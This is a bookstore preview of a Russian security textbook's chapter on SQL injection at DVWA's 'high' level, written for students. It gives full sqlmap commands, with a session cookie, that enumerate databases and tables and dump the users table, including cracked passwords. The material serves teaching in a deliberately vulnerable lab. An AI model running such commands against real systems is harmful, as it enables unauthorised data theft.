1. книги
  2. Прочая образовательная литература
  3. Иван Андреевич Трещев

Анализ защищенности распределенных информационных систем. DVWA. Для студентов технических специальностей

Иван Андреевич Трещев
Обложка книги

Данная книга является первой в цикле об анализе защищенности распределенных информационных систем с использованием общедоступных образов операционных систем, содержащих уязвимости. Информация будет полезна как исследователям, повышающим уровень своих компетенций в области информационной безопасности, так и специалистам по защите информации для выполнения анализа на проникновение за периметр предприятий.

Оглавление

Купить книгу

Приведённый ознакомительный фрагмент книги «Анализ защищенности распределенных информационных систем. DVWA. Для студентов технических специальностей» предоставлен нашим книжным партнёром — компанией ЛитРес.

Купить и скачать полную версию книги в форматах FB2, ePub, MOBI, TXT, HTML, RTF и других

9 SQL Injection High

SQL Injection (внедрение кода SQL) — атака, связанная с внедрением в SQL-запрос сервера к СУБД произвольного кода.

В DVWA на странице SQL Injection представлена ссылка на форму ввода id пользователя, изображённую на рисунке 9.1.

Рисунок 9.1 — Форма ввода

Для эксплуатации уязвимости будет использована утилита sqlmap.

Отличительная особенность уровня — ввод данных и вывод данных осуществляются на разных страницах. Для решения этой проблемы будет использоваться аргумент — second-url.

На рисунке 9.2 представлена команда, запускающая сканирование: «sqlmap — u"http://kalkt.com:8001/vulnerabilities/sqli/session-input.php" — second-url"http://kalkt.com:8001/vulnerabilities/sqli/" — data „id=1&Submit=Submit“ — cookie „PHPSESSID=l6145c6k5p19go7ga5g16mh7k0; security=high“».

Рисунок 9.2 — Запуск сканирования

В ходе сканирования было выяснено, что используется СУБД MySQL, уязвимый параметр — id. Результаты сканирования изображены на рисунке 9.3.

Рисунок 9.3 — Результаты сканирования

Далее необходимо получить список баз данных, для этого к команде добавляется ключ — dbs: «sqlmap — u"http://kalkt.com:8001/vulnerabilities/sqli/session-input.php" — second-url"http://kalkt.com:8001/vulnerabilities/sqli/" — data „id=1&Submit=Submit“ — cookie „PHPSESSID=l6145c6k5p19go7ga5g16mh7k0; security=high“ — dbs». Результаты изображены на рисунке 9.4.

Рисунок 9.4 — Список баз данных

Теперь можно получить список таблиц в базе dvwa. Для этого через ключ — D нужно указать БД, затем указать ключ — tables, чтобы получить названия таблиц: «sqlmap — u"http://kalkt.com:8001/vulnerabilities/sqli/session-input.php" — second-url"http://kalkt.com:8001/vulnerabilities/sqli/" — data „id=1&Submit=Submit“ — cookie „PHPSESSID=l6145c6k5p19go7ga5g16mh7k0; security=high“ — D dvwa — tables». Результаты изображены на рисунке 9.5.

Рисунок 9.5 — Таблицы в базе dvwa

Теперь можно получить записи таблицы users. Для этого ключ — tables меняется на — T users, добавляется ключ — dump: «sqlmap — u"http://kalkt.com:8001/vulnerabilities/sqli/session-input.php" — second-url"http://kalkt.com:8001/vulnerabilities/sqli/" — data „id=1&Submit=Submit“ — cookie „PHPSESSID=l6145c6k5p19go7ga5g16mh7k0; security=high“ — D — T users — dump». Результаты изображены на рисунке 9.6.

Рисунок 9.6 — Содержимое таблицы users

Также на скриншоте видно, что sqlmap в процессе работы нашёл пароли в открытом виде, использовав перебор по встроенному словарю.

Оглавление

Купить книгу

Приведённый ознакомительный фрагмент книги «Анализ защищенности распределенных информационных систем. DVWA. Для студентов технических специальностей» предоставлен нашим книжным партнёром — компанией ЛитРес.

Купить и скачать полную версию книги в форматах FB2, ePub, MOBI, TXT, HTML, RTF и других

Вам также может быть интересно

а б в г д е ё ж з и й к л м н о п р с т у ф х ц ч ш щ э ю я